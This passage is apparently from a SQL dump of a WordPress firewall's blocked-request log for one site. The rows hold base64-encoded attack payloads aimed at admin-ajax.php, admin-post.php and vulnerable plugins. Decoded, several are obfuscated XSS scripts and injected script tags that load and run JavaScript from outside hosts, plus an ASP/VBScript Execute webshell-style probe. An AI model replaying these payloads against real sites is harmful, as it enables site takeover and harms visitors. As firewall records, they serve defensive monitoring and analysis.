OTgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDk5LypfYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYSA9IF9hYWFhYWFhYShfYWFhYWFhYWEpO2lmKF9hYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWEoX2FhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYShfYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37908,1570674419.448804,1570674418.575300,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//Templates/red.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JlZF0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9UZW1wbGF0ZXMvcmVkLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37909,1570674417.615912,1570674416.809300,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//Somnus/Somnus.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3hpYW9saWFuZ10=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9Tb21udXMvU29tbnVzLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37860,1569949951.105837,1569949950.189200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDk5LypfYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYSA9IF9hYWFhYWFhYShfYWFhYWFhYWEpO2lmKF9hYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWEoX2FhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYShfYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37967,1571333939.299077,1571333938.400400,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37943,1571333149.728569,1571333148.577500,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2VtYWlsXQ==\",\"paramValue\":\"PHN2Zy9vbmxvYWQ9ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDMyLDQwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMDEsMTA4LDEwMSwxMDksMzIsNjEsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDk5LDExNCwxMDEsOTcsMTE2LDEwMSw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiw0MCwzOSwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDQxLDU5LDMyLDEwLDksMTAxLDEwOCwxMDEsMTA5LDQ2LDExNiwxMjEsMTEyLDEwMSwzMiw2MSwzMiwzOSwxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDU5LDMyLDEwLDMyLDMyLDMyLDMyLDEwMSwxMDgsMTAxLDEwOSw0NiwxMTUsMTE0LDk5LDMyLDYxLDMyLDM5LDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTksMTAwLDQ2LDExMiwxMTQsMTA1LDExOCw5Nyw5OSwxMjEsMTA4LDExMSw5OSw5NywxMTYsMTA1LDExMSwxMTAsMTAyLDExMSwxMTQsMTA4LDExMSw5OSw0Niw5OSwxMTEsMTA5LDQ3LDk5LDExMSwxMTQsMTEwLDQ3LDEwMiwxMDgsMTAxLDEyMCw0NiwxMDYsMTE1LDYzLDExNiwxMTIsNjEsNTIsMzksNTksMTAsMzIsMzIsMzIsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDEwMywxMDEsMTE2LDY5LDEwOCwxMDEsMTA5LDEwMSwxMTAsMTE2LDExNSw2NiwxMjEsODQsOTcsMTAzLDc4LDk3LDEwOSwxMDEsNDAsMzQsMTA0LDEwMSw5NywxMDAsMzQsNDEsOTEsNDgsOTMsNDYsOTcsMTEyLDExMiwxMDEsMTEwLDEwMCw2NywxMDQsMTA1LDEwOCwxMDAsNDAsMTAxLDEwOCwxMDEsMTA5LDQxLDU5LDEwLDMyLDMyLDEyNSw0MSw0MCw0MSw1OSkpOz5AdGVzdC5jb20=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37968,1571333937.336253,1571333936.391200,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF81cXg0bDg4PVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfNjcyOXliZSovLDExNi8qKi8sMTE2Lypfa2pxYWRnMyovLDExMi8qX2QyeXBkbWsqLywxMTUvKl9ranFhZGczKi8sNTgvKl82NzI5eWJlKi8sNDcvKl9kMnlwZG1rKi8sNDcvKl82NzI5eWJlKi8sOTkvKl81cXg0bDg4Ki8sMTAwLypfa2pxYWRnMyovLDQ2LypfZDJ5cGRtayovLDExMi8qXzVxeDRsODgqLywxMTQvKl9ranFhZGczKi8sMTA1LypfNjcyOXliZSovLDExOC8qXzY3Mjl5YmUqLyw5Ny8qXzVxeDRsODgqLyw5OS8qKi8sMTIxLypfa2pxYWRnMyovLDEwOC8qKi8sMTExLyoqLyw5OS8qXzY3Mjl5YmUqLyw5Ny8qX2tqcWFkZzMqLywxMTYvKiovLDEwNS8qXzVxeDRsODgqLywxMTEvKl9kMnlwZG1rKi8sMTEwLypfNjcyOXliZSovLDEwMi8qX2tqcWFkZzMqLywxMTEvKl81cXg0bDg4Ki8sMTE0LypfZDJ5cGRtayovLDEwOC8qXzY3Mjl5YmUqLywxMTEvKl82NzI5eWJlKi8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl81cXg0bDg4Ki8sNDcvKl81cXg0bDg4Ki8sMTE2LypfZDJ5cGRtayovLDk3LyoqLywxMTIvKiovLDExMi8qXzVxeDRsODgqLywxMDEvKl9kMnlwZG1rKi8sMTE0LypfZDJ5cGRtayovLDQ2LypfNXF4NGw4OCovLDEwNi8qX2tqcWFkZzMqLywxMTUvKl9ranFhZGczKi8sNjMvKl81cXg0bDg4Ki8sMTA5LyoqLyw2MS8qKi8sMTA5LypfZDJ5cGRtayovKTt2YXIgX2QyeXBkbWsgPSBfa2pxYWRnMyhfNXF4NGw4OCk7aWYoX2QyeXBkbWsubGVuZ3RoID4gMyl7X2MwYmlhMDEoX2QyeXBkbWspO30gZnVuY3Rpb24gX2tqcWFkZzMoX3d5anZ0bWIpeyB2YXIgXzY3Mjl5YmUgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfNjcyOXliZS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX3d5anZ0bWIsIGZhbHNlICk7XzY3Mjl5YmUuc2VuZCggbnVsbCApO3JldHVybiBfNjcyOXliZS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9jMGJpYTAxKF83N3hwbm5vKXsgdmFyIF9mcXp5cWtsID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfNzd4cG5ubysnIHJldHVybiB4K3k7Jyk7X2Zxenlxa2woMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37993,1571334696.819877,1571334695.884000,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2VtYWlsXQ==\",\"paramValue\":\"PHN2Zy9vbmxvYWQ9ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDMyLDQwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMDEsMTA4LDEwMSwxMDksMzIsNjEsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDk5LDExNCwxMDEsOTcsMTE2LDEwMSw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiw0MCwzOSwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDQxLDU5LDMyLDEwLDksMTAxLDEwOCwxMDEsMTA5LDQ2LDExNiwxMjEsMTEyLDEwMSwzMiw2MSwzMiwzOSwxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDU5LDMyLDEwLDMyLDMyLDMyLDMyLDEwMSwxMDgsMTAxLDEwOSw0NiwxMTUsMTE0LDk5LDMyLDYxLDMyLDM5LDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTksMTAwLDQ2LDExMiwxMTQsMTA1LDExOCw5Nyw5OSwxMjEsMTA4LDExMSw5OSw5NywxMTYsMTA1LDExMSwxMTAsMTAyLDExMSwxMTQsMTA4LDExMSw5OSw0Niw5OSwxMTEsMTA5LDQ3LDk5LDExMSwxMTQsMTEwLDQ3LDEwMiwxMDgsMTAxLDEyMCw0NiwxMDYsMTE1LDYzLDExNiwxMTIsNjEsNTIsMzksNTksMTAsMzIsMzIsMzIsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDEwMywxMDEsMTE2LDY5LDEwOCwxMDEsMTA5LDEwMSwxMTAsMTE2LDExNSw2NiwxMjEsODQsOTcsMTAzLDc4LDk3LDEwOSwxMDEsNDAsMzQsMTA0LDEwMSw5NywxMDAsMzQsNDEsOTEsNDgsOTMsNDYsOTcsMTEyLDExMiwxMDEsMTEwLDEwMCw2NywxMDQsMTA1LDEwOCwxMDAsNDAsMTAxLDEwOCwxMDEsMTA5LDQxLDU5LDEwLDMyLDMyLDEyNSw0MSw0MCw0MSw1OSkpOz5AdGVzdC5jb20=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37946,1571333192.063151,1571333191.190100,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin','\"><script type=text/javascript src=\'https://cd.privacylocationforloc.com/track&tp=3\'></script>','???script type=text/javascript src=?https://cd.privacylocationforloc.com/track&tp=3???/script?','blocked:waf','Generic XSS Injection in IP Forwarding Headers','{\"learningMode\":0,\"failedRules\":\"59\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1gtRm9yd2FyZGVkLUZvcl0=\",\"paramValue\":\"Ij48c2NyaXB0IHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz0naHR0cHM6Ly9jZC5wcml2YWN5bG9jYXRpb25mb3Jsb2MuY29tL3RyYWNrJnRwPTMnPjwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWlu\",\"category\":\"xss\",\"ssl\":1}'),(37965,1571333945.895290,1571333944.767700,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9wc2NiYmZ4YmNuMmxqZDhxPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfcnF0eHFzZHJ1YXJoNGF4YSovLDExNi8qKi8sMTE2LypfNDN3d3hxMWQxZ3Y0czVuOCovLDExMi8qX214bnN1M3Vsc3hoMmZ0bnkqLywxMTUvKl80M3d3eHExZDFndjRzNW44Ki8sNTgvKl9ycXR4cXNkcnVhcmg0YXhhKi8sNDcvKl9teG5zdTN1bHN4aDJmdG55Ki8sNDcvKl9ycXR4cXNkcnVhcmg0YXhhKi8sOTkvKl9wc2NiYmZ4YmNuMmxqZDhxKi8sMTAwLypfNDN3d3hxMWQxZ3Y0czVuOCovLDQ2LypfbXhuc3UzdWxzeGgyZnRueSovLDExMi8qX3BzY2JiZnhiY24ybGpkOHEqLywxMTQvKl80M3d3eHExZDFndjRzNW44Ki8sMTA1LypfcnF0eHFzZHJ1YXJoNGF4YSovLDExOC8qX3JxdHhxc2RydWFyaDRheGEqLyw5Ny8qX3BzY2JiZnhiY24ybGpkOHEqLyw5OS8qKi8sMTIxLypfNDN3d3hxMWQxZ3Y0czVuOCovLDEwOC8qKi8sMTExLyoqLyw5OS8qX3JxdHhxc2RydWFyaDRheGEqLyw5Ny8qXzQzd3d4cTFkMWd2NHM1bjgqLywxMTYvKiovLDEwNS8qX3BzY2JiZnhiY24ybGpkOHEqLywxMTEvKl9teG5zdTN1bHN4aDJmdG55Ki8sMTEwLypfcnF0eHFzZHJ1YXJoNGF4YSovLDEwMi8qXzQzd3d4cTFkMWd2NHM1bjgqLywxMTEvKl9wc2NiYmZ4YmNuMmxqZDhxKi8sMTE0LypfbXhuc3UzdWxzeGgyZnRueSovLDEwOC8qX3JxdHhxc2RydWFyaDRheGEqLywxMTEvKl9ycXR4cXNkcnVhcmg0YXhhKi8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl9wc2NiYmZ4YmNuMmxqZDhxKi8sNDcvKl9wc2NiYmZ4YmNuMmxqZDhxKi8sMTE2LypfbXhuc3UzdWxzeGgyZnRueSovLDk3LyoqLywxMTIvKiovLDExMi8qX3BzY2JiZnhiY24ybGpkOHEqLywxMDEvKl9teG5zdTN1bHN4aDJmdG55Ki8sMTE0LypfbXhuc3UzdWxzeGgyZnRueSovLDQ2LypfcHNjYmJmeGJjbjJsamQ4cSovLDEwNi8qXzQzd3d4cTFkMWd2NHM1bjgqLywxMTUvKl80M3d3eHExZDFndjRzNW44Ki8sNjMvKl9wc2NiYmZ4YmNuMmxqZDhxKi8sMTA5LyoqLyw2MS8qKi8sMTA5LypfbXhuc3UzdWxzeGgyZnRueSovKTt2YXIgX214bnN1M3Vsc3hoMmZ0bnkgPSBfNDN3d3hxMWQxZ3Y0czVuOChfcHNjYmJmeGJjbjJsamQ4cSk7aWYoX214bnN1M3Vsc3hoMmZ0bnkubGVuZ3RoID4gMyl7X3lxb3Zqd3ozaTV0azAwNXYoX214bnN1M3Vsc3hoMmZ0bnkpO30gZnVuY3Rpb24gXzQzd3d4cTFkMWd2NHM1bjgoXzZuODdicHN5cjUxMG8zZjMpeyB2YXIgX3JxdHhxc2RydWFyaDRheGEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfcnF0eHFzZHJ1YXJoNGF4YS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgXzZuODdicHN5cjUxMG8zZjMsIGZhbHNlICk7X3JxdHhxc2RydWFyaDRheGEuc2VuZCggbnVsbCApO3JldHVybiBfcnF0eHFzZHJ1YXJoNGF4YS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF95cW92and6M2k1dGswMDV2KF9zbm55Ympmc3IzMXdwYnh1KXsgdmFyIF8wZjB0bHo4dmVrbGxjaGg0ID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfc25ueWJqZnNyMzF3cGJ4dSsnIHJldHVybiB4K3k7Jyk7XzBmMHRsejh2ZWtsbGNoaDQoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37945,1571333194.460383,1571333192.899100,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/wp-login.php','\"><script type=text/javascript src=\'https://cd.privacylocationforloc.com/track&tp=3\'></script>','???script type=text/javascript src=?https://cd.privacylocationforloc.com/track&tp=3???/script?','blocked:waf','Generic XSS Injection in IP Forwarding Headers','{\"learningMode\":0,\"failedRules\":\"59\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1gtRm9yd2FyZGVkLUZvcl0=\",\"paramValue\":\"Ij48c2NyaXB0IHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz0naHR0cHM6Ly9jZC5wcml2YWN5bG9jYXRpb25mb3Jsb2MuY29tL3RyYWNrJnRwPTMnPjwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL3dwLWxvZ2luLnBocA==\",\"category\":\"xss\",\"ssl\":1}'),(37944,1571333211.051030,1571333210.135900,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=save_map_name',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W21hcE5hbWVd\",\"paramValue\":\"Ij48c2NyaXB0IHNyYz0naHR0cHM6Ly9jZC5wcml2YWN5bG9jYXRpb25mb3Jsb2MuY29tL3RyYWNrJnYyJyB0eXBlPXRleHQvamF2YXNjcmlwdD48L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37964,1571333954.728755,1571333953.746400,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer 